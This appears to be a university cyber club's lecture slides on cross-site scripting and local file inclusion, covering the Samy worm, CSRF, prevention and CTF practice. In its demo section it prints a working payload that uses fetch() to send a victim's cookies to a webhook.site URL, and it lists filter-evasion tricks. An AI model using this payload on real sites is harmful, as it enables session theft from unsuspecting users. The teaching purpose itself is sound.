XSS and LFI

​

slides: no

Announcements

• Welcome!
• Times for future events:
• PBR Tuesdays 6-8PM
• Cyber Academy Wednesdays 6-8PM
• Special Topics 8-10PM
• Game Hacking this week!
• LA CTF Registration out: https://lactf.uclaacm.com/

Cyber Academy Plan

Intro to web

Foundations of web hacking

Inject code into websites

Hacking databases and logins

Practice pentesting

XSS /

LFI

Bruinwalk Hacking

SQL Injection

3

6

7

Background Information

(some OWASP stats, importance, basic ideas/hook/teaser)

Review: Client-Server Model

Review: Client-Server Model

1

Review: Client-Server Model

1

2

Review: Client-Server Model

1

2

3

Review: Client-Server Model

1

2

3

4

Review: Client-Server Model

1

2

3

4

5

Some More Important Details…

Client-Server Model + Context

1

2

3

5

4

Client-Server Model + Context

1

2

3

0

4

5

Client-Server Model + Context

1

2

3a

0

4

5

3b

Web Review: Client-Server Model

1. Your Computer (client) sends a request to a Server
2. The Server processes the request (hopefully)
3. The server sends back a response, containing whatever your request asked for

(replace with graphic(s))

Web Review: Client-Server Model + Context

• You get a link/request created for you somewhere
• Your Computer (client) sends the request to a Server
• The Server processes the request (hopefully)
• The server sends back a response, containing whatever your request asked for
• Your computer processes the content of the request, and displays some stuff on your screen

(replace with graphic(s))

Web Review: Cookies

• Your Identification
• Third-party tracking
• Activity records
• Authentication
• Mainly for convenience
• You keep track of it�(instead of the website)

Basics: Javascript

Website Functionality:

• Dynamic content
• Cookies
• document.cookie()
• Cross-site Activity
• “fetch()”
• Much more!
• essentially, anytime�a website does �something interesting

The Same-Origin Policy (SOP)

• Scripts contained in a web page can only access data in another web page if they have the same origin.
• Same origin means same scheme (e.g. http, https), hostname (domain, e.g. www.youtube.com), and port.
• SOP only applies to scripts.
• Images, CSS, dynamically-loaded scripts, etc. can be accessed across origins.
• SOP can be bypassed by XSS vulnerabilities.

​

​

What is XSS (Cross-Site Scripting)?

• Inject malicious scripts into a web application.
• Often in the form of Javascript
• Unexpected by browser.
• Quite prevalent!

Reflected vs. Stored XSS

Reflected:

• If web application immediately includes data it receives without sanitizing (i.e. processing) it.
• Attacker constructs URL for user to execute in their own browser.

​

Stored:

• Script that is stored in the website (e.g. in the form of forum messages).
• Site visitors may unknowingly interact with + execute the code.

Reflected XSS

• Left Image:
• Normal input term.
• Right Image (real world example - Uber, 2016):
• Input term contains payload and was not sanitized.

Stored XSS: Samy worm

• Displayed a message and Javascript code in user’s MySpace profile page.
• Loading the profile page runs the code in the victim’s browser.
• Made victim send Samy friend request.
• Replicated payload in victim’s own profile page.

DOM-Based XSS

• Attacker injects malicious payloads into webpage during runtime (i.e. without changing the HTTP response, which stored/reflected XSS do).
• Possible when webpage contains problematic JavaScript on the user’s end.
• Script takes data from untrusted, attacker-controllable source (e.g. URL) and puts it into a sink that supports dynamic code execution in the DOM (e.g. the HTML document)

Demo

Demo: Stored XSS attack on message board

upload message containing malicious xss payload

return updated malicious html page

Malicious User

Victim User

Server

(Stores Messages)

Time

request message board page

message board html

request message board page

malicious message board html

arbitrary javascript code execution in victim user’s browser

Demo: Stored XSS attack on message board

​

Demo: Stored XSS attack on message board

POST /upload?message=<script>attack()</script>&author=

<html>...<script>attack()</script>...</html>

Malicious User

Victim User

Server

(Stores Messages)

GET /

<html>...clean html code…</html>

GET /

<html>...<script>attack()</script>...</html>

arbitrary javascript code execution in victim user’s browser.

attack() can be replaced with any javascript code

Demo: Stored XSS attack on message board

​

Implications

• We were able to run malicious javascript on someone else’s browser
• Data theft (via fetch, etc.)
• cookies
• jwt/session tokens
• files
• Browser hijacking
• redirects user to a malicious site
• can be used for phishing
• Content spoofing - misinformation

Attack from demo

• uses webhook.site - temporary webhook for stolen data
• Bellow payload runs on victims browser
• sends victims cookies to webhook -> us

​

<script> fetch('https://webhook.site/<your _url>',

{method: 'POST', body: document.cookie});

</script>

Prevention

Preventing XSS is hard (true for most types of injection as well)

• Filters are used to remove injected code
• Writing a fool-proof filter is easier said than done

Example:

​

Filter

Counters

Prevention Part 2

patched filter

counter

List of similar attacks

Robust Filter

• Good for server side
• Simply replaces any special character with its escape sequence
• Characters still render, but html tags are not interpreted as html

​

In general you shouldn’t write your own filter.

Most modern frameworks filter by default

More in-depth prevention guide

A Quick Aside: CSRF

• Stands for "Cross Site Request Forgery"
• CSRF is when you make a request to another site that the user is logged into (e.g. send a request to google.com/logout from example.com)
• Relies on cookies being sent in the request
• No longer works because cookies are SameSite=Lax by default (basically means they won't be sent cross-site)

What an "Admin Bot" is

• Only used in CTF challenges (not in the real world)
• Bot that opens a browser to imitate a user visiting a page
• Useful because it automatically verifies that your XSS payload works without a real person opening the site

Local File Inclusion (LFI)

• when an application uses a file path as an input
• it assumes this path is trusted
• typically in PHP based sites

FILE

How can this be a vulnerability?

​

• LFI used as an attack technique that tricks a web application to expose files from their system
• can potentially lead to remote code execution or XSS
• done through same http request in the browser

Simple ways to execute LFI

• Takes place when a web app takes a path to a file as input
• that input can be replaced with a … local file

​

​

• Traversing Directories and exposing files
• Remote code execution
• If you are able to upload files, if you know the path you can potentially execute any server side malicious code you want

How can you test this vulnerability?

• When a function opens a file and includes it inside the web doc
• filtering/checking
• Test your own application!
• try to show other files
• don’t take file names from user

How to protect your web app?

• Databases
• Instead of including files on your web server
• Assigning IDs
• save file paths as ids – not alterable
• Server Instructions
• server send download headers automatically instead of executing files in directories
• Prevent file traversal / inputs from User

WEB APP

LFI

XSS

US

A Sample Exploit

Samy

(some recent examples: zoom xss exploit, any of various browser exploits, etc)

https://thehackernews.com/2022/04/critical-lfi-vulnerability-reported-in.html

https://portswigger.net/daily-swig/zoom-whiteboard-patches-xss-bug

(samy? Edit: slightly went over in stored xss slide example as well)

Samy

Samy

MySpace Filters:

• most tags (a, img, div, embed, script, body)
• triggers (onSomething)
• the word javascript
• escaped quotes

Other measures:

• XML/HTTP requests prevented (onreadystatechange removed)
• hash generated from pre-post page

Samy

“In the interest of…interest”

Tricks to know:

• Some browsers allow javascript in CSS tags
• Splitting keywords (‘inne’+ ‘rHTML’; “java\nscript”)
• Reloading on a different domain to get around Same-Origin Policy
• Manually escaping some data

More details here

Samy

When Samy’s XSS Myspace Post was viewed:

• Added Samy as a friend
• Made the same post on their page
• Appended to bio: “but most of all, samy is my hero”

Results:

• Over 1 million friend requests in 20 hours
• Fastest spreading virus of all time
• Received three years' probation, one computer, no access to the Internet; �90 days' community service, $15,000–20,000 in restitution

Try It Yourself!

• Challenges are up at acmcyber.com/challenges
• Cyber Academy rules:
• individual
• you have to re-create account if you made one under your discord username for GM
• but feel free to ask for help in #questions
• can also PM the challenge author if your question will give away part of solution!
• can work on past challenges from previous weeks
• will have until weekend before CTF After Dark (Week 7 Sunday)
• writeups and solutions for all weeks will be released then

Thanks for coming!

​

Check out our linktree:

linktr.ee/uclacyber